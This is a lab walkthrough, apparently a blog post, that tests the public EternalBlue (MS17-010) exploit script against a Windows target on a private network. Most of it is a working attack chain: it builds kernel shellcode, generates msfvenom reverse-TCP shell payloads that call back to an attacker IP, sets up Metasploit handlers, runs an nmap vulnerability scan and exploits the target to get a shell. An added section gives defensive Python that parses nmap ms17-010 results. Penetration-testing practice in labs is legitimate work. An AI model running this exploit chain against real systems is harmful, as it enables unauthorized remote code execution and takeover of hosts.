This is a test of an Eternalblue exploit script from worawit:
https://github.com/worawit/MS17-010/blob/master/eternalblue_exploit7.py
The script claims to have been tested on:
- Windows 7 SP1 x64
- Windows 2008 R2 SP1 x64
- Windows 7 SP1 x86
- Windows 2008 SP1 x64
- Windows 2008 SP1 x86
Get the main script:
wget https://github.com/worawit/MS17-010/raw/master/eternalblue_exploit7.py
dos2unix eternalblue_exploit7.py
The exploit needs kernel shellcode that has to be assembled first. I downloaded and installed NASM on a Windows VM.
On my Windows 7 32 bit VM I downloaded the kernel shellcode from:
https://raw.githubusercontent.com/worawit/MS17-010/master/shellcode/eternalblue_kshellcode_x86.asm
I saved the shellcode into a file called:
sc_x86_kernel.asm
The shellcode needs to be in a raw binary form. I should be able to use NASM with the -f bin option to compile the assembly code to a raw binary file.
C:\Users\nc\AppData\Local\bin\NASM\nasm.exe -f bin sc_x86_kernel.asm -o sc_x86_kernel.bin
I copied this sc_x86_kernel.bin file using Filezilla to my Kali box.
Looking at this file:
https://github.com/worawit/MS17-010/blob/master/shellcode/eternalblue_sc_merge.py
It is my understanding that I need to create some shellcode with msfvenom and then concatenate that onto the end of this kernel shellcode.
Creating the Windows 32 bit shellcode using msfvenom:
msfvenom -p windows/shell/reverse_tcp LPORT=443 LHOST=10.10.77.185 --format raw -o sc_x86_msf.bin EXITFUNC=thread
Concatenating the 2 files:
cat sc_x86_kernel.bin sc_x86_msf.bin > sc_x86.bin
On my Windows 7 64 bit VM I downloaded the kernel shellcode file from:
https://raw.githubusercontent.com/worawit/MS17-010/master/shellcode/eternalblue_kshellcode_x64.asm
I saved the shellcode into a file called:
sc_x64_kernel.asm
The shellcode needs to be in a raw binary form. I should be able to use NASM with the -f bin option to compile the assembly code to a raw binary file.
C:\exploits\shellcode>C:\Users\nc\AppData\Local\bin\NASM\nasm.exe -f bin sc_x64_kernel.asm -o sc_x64_kernel.bin
I copied this sc_x64_kernel.bin file using Filezilla to my Kali box.
Creating the Windows 64 bit shellcode using msfvenom:
msfvenom -p windows/x64/shell/reverse_tcp LPORT=444 LHOST=10.10.77.185 --format raw -o sc_x64_msf.bin EXITFUNC=thread
Concatenating the 2 files:
cat sc_x64_kernel.bin sc_x64_msf.bin > sc_x64.bin
Create the eternalblue_sc_merge.py script from the first 20 lines of this file:
https://raw.githubusercontent.com/worawit/MS17-010/master/shellcode/eternalblue_sc_merge.py
Run the script to create the sc_all.bin file:
python eternalblue_sc_merge.py sc_x86.bin sc_x64.bin sc_all.bin
The last step is to test this against a vulnerable target.
First we need to set up a multi/handler for each payload (one per port) to catch the potential reverse connections:
service postgresql start
msfconsole -q
use exploit/multi/handler
set ExitOnSession false
setg LHOST 10.10.77.185
set PAYLOAD windows/x64/shell/reverse_tcp
set EXITFUNC thread
set LPORT 444
exploit -j
...
set PAYLOAD windows/shell/reverse_tcp
set LPORT 443
exploit -j
Ensure that our vulnerable target is running. The IP address of the target is:
10.10.77.161
An nmap NSE scan with the smb-vuln-ms17-010 script reports that the target is vulnerable:
nmap -sS -Pn -n -sV -p 445 --open --min-rate 10 --script smb-vuln-ms17-010 --script-args=unsafe=1 10.10.77.161 -oA "nse_vuln"
...
Host script results:
| smb-vuln-ms17-010:
| VULNERABLE:
| Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010)
| State: VULNERABLE
| IDs: CVE:CVE-2017-0143
| Risk factor: HIGH
| A critical remote code execution vulnerability exists in Microsoft SMBv1
| servers (ms17-010).
...
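As an added example (not part of the original post and not code from the nmap project), the following Python parses nmap's normal-format output of that scan across many hosts and reports, per host, the State and CVE the smb-vuln-ms17-010 script printed, which is the check a defender runs over an internal sweep to find unpatched SMBv1 hosts. The sample scan text is constructed, modelled on the block above; the second host is made up to show the not-flagged path.

```python
# Added example (not from the original post): parse nmap normal output for the
# smb-vuln-ms17-010 check and report, per host, the State and CVE it cited.
import re

# Constructed sample modelled on the post's scan block, with nmap's indentation;
# the second host is made up to exercise the not-flagged path.
SAMPLE_SCAN = """\
Nmap scan report for 10.10.77.161
Host script results:
| smb-vuln-ms17-010:
|   VULNERABLE:
|   Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010)
|     State: VULNERABLE
|     IDs:  CVE:CVE-2017-0143
|     Risk factor: HIGH
|_
Nmap scan report for 10.10.77.162
Host script results:
|_smb-vuln-ms17-010: Could not negotiate a connection:SMB: Failed to receive bytes: ERROR
"""

HOST_RE = re.compile(r"^Nmap scan report for (\S+)")
SCRIPT_RE = re.compile(r"^\|[ _](\S+):")       # first line of an NSE script block
STATE_RE = re.compile(r"^\|\s+State:\s+(\S+)")
CVE_RE = re.compile(r"CVE:(CVE-\d{4}-\d+)")

def parse_ms17_010(text):
    """Map host -> {'vulnerable', 'state', 'cve'} from nmap -oN style text."""
    results, host, in_script = {}, None, False
    for line in text.splitlines():
        m = HOST_RE.match(line)
        if m:                                   # a new host section begins
            host, in_script = m.group(1), False
            results[host] = {"vulnerable": False, "state": None, "cve": None}
            continue
        if host is None or not line.startswith("|"):
            in_script = False                   # outside any script output
            continue
        m = SCRIPT_RE.match(line)
        if m:                                   # new script block: is it ours?
            in_script = m.group(1) == "smb-vuln-ms17-010"
            continue
        if not in_script:
            continue
        m = STATE_RE.match(line)
        if m:
            results[host]["state"] = m.group(1)
            results[host]["vulnerable"] = m.group(1) == "VULNERABLE"
        m = CVE_RE.search(line)
        if m:
            results[host]["cve"] = m.group(1)
    return results
```

Feed it the .nmap file written by -oA (or the console output) to get a host-by-host list of what still needs the MS17-010 patch or SMBv1 disabled.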
Run the script to see if we are in business:
python eternalblue_exploit7.py 10.10.77.161 sc_all.bin
We see something happened on the msfconsole:
Press the Enter key to get a prompt.
Run this to interact with the first session (sessions -l to see what sessions are available):
sessions -i 1
Resources:
NASM http://www.nasm.us/
Windows Server 2008 https://www.microsoft.com/en-ca/download/details.aspx?id=5023
Windows 7 download https://www.microsoft.com/en-ca/software-download/windows7
Kali https://www.kali.org/downloads/